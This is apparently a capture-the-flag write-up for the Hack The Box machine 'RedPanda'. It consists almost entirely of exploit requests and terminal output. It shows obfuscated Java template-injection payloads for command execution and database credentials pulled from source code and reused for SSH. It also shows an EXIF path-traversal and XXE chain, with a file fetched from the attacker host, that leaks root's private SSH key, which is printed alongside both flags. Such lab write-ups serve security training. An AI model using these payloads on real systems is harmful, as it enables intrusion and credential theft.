# Enum Web page

```
<title>Red Panda Search | Made with Spring Boot</title>
```

# SSTI JAVA

```
POST /search HTTP/1.1
Host: 10.129.227.207:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.129.227.207:8080
Connection: close
Referer: http://10.129.227.207:8080/
Upgrade-Insecure-Requests: 1

name=*{7*7}
```

# SSTI RCE

`cat /etc/passwd`
```
POST /search HTTP/1.1
Host: 10.129.227.207:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 767
Origin: http://10.129.227.207:8080
Connection: close
Referer: http://10.129.227.207:8080/
Upgrade-Insecure-Requests: 1

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```

`env`
```
POST /search HTTP/1.1
Host: 10.129.227.207:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Origin: http://10.129.227.207:8080
Connection: close
Referer: http://10.129.227.207:8080/
Upgrade-Insecure-Requests: 1

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(101).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(118))).getInputStream())}
```

# SSH ACCESS

Read Main file.

`cat /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java`
```
POST /search HTTP/1.1
Host: 10.129.227.207:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4064
Origin: http://10.129.227.207:8080
Connection: close
Referer: http://10.129.227.207:8080/
Upgrade-Insecure-Requests: 1

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(95)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(95)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(95)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(97))).getInputStream())}
```

Get credentials of database connection.
```
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
```

We can use on SSH service.
```
┌──(root㉿kali)-[~/htb/Box/Linux/RedPanda]
└─# ssh woodenk@10.129.227.207
woodenk@10.129.227.207's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 12 Jul 2022 07:36:45 PM UTC

  System load:           0.0
  Usage of /:            80.5% of 4.30GB
  Memory usage:          40%
  Swap usage:            0%
  Processes:             212
  Users logged in:       0
  IPv4 address for eth0: 10.129.227.207
  IPv6 address for eth0: dead:beef::250:56ff:fe96:47be


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Jul  5 05:51:25 2022 from 10.10.14.23
woodenk@redpanda:~$ cat user.txt 
4e1e855981e0bbc8957b6a979163c8dc
```

# Priv Esc

```
┌──(root㉿kali)-[~/htb/Box/Linux/RedPanda]
└─# exiftool -Artist='../home/woodenk/root' doom.jpg
    1 image files updated
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/RedPanda]
└─# nano root_creds.xml
```

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>
    <uri>/../../../../../../../home/woodenk/doom.jpg</uri>
    <doom>&xxe;</doom>
    <views>0</views>
  </image>
  <totalviews>0</totalviews>
</credits>
```

```
woodenk@redpanda:~$ wget 10.10.14.82/root_creds.xml
--2022-07-12 20:22:45--  http://10.10.14.82/root_creds.xml
Connecting to 10.10.14.82:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 309 [application/xml]
Saving to: ‘root_creds.xml’

root_creds.xml                       100%[===================================================================>]     309  --.-KB/s    in 0s      

2022-07-12 20:22:45 (39.6 MB/s) - ‘root_creds.xml’ saved [309/309]

woodenk@redpanda:~$ wget 10.10.14.82/doom.jpg
--2022-07-12 20:22:57--  http://10.10.14.82/doom.jpg
Connecting to 10.10.14.82:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8517 (8.3K) [image/jpeg]
Saving to: ‘doom.jpg.1’

doom.jpg.1                           100%[===================================================================>]   8.32K  --.-KB/s    in 0.001s  

2022-07-12 20:22:57 (13.2 MB/s) - ‘doom.jpg.1’ saved [8517/8517]
```

```
GET /stats?author=damian HTTP/1.1
Host: 10.129.227.207:8080
User-Agent: ||/../../../../../../../home/woodenk/doom.jpg
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

```
woodenk@redpanda:~$ cat root_creds.xml 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace>
<credits>
  <author>damian</author>
  <image>
    <uri>/../../../../../../../home/woodenk/doom.jpg</uri>
    <doom>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQAAAJBRbb26UW29
ugAAAAtzc2gtZWQyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQ
AAAECj9KoL1KnAlvQDz93ztNrROky2arZpP8t8UgdfLI0HvN5Q081w1miL4ByNky01txxJ
RwNRnQ60aT55qz5sV7N9AAAADXJvb3RAcmVkcGFuZGE=
-----END OPENSSH PRIVATE KEY-----</doom>
    <views>3</views>
  </image>
  <totalviews>3</totalviews>
</credits>
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/RedPanda]
└─# ssh -i root_rsa root@10.129.227.207     
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 12 Jul 2022 08:27:37 PM UTC

  System load:           0.0
  Usage of /:            80.5% of 4.30GB
  Memory usage:          51%
  Swap usage:            0%
  Processes:             218
  Users logged in:       1
  IPv4 address for eth0: 10.129.227.207
  IPv6 address for eth0: dead:beef::250:56ff:fe96:47be


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jun 30 13:17:41 2022
root@redpanda:~# cat root.txt 
e62bdf7dc9691e1259839a85509cb34e
root@redpanda:~#
```

# References
https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ \
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#java \
https://github.com/VikasVarshney/ssti-payload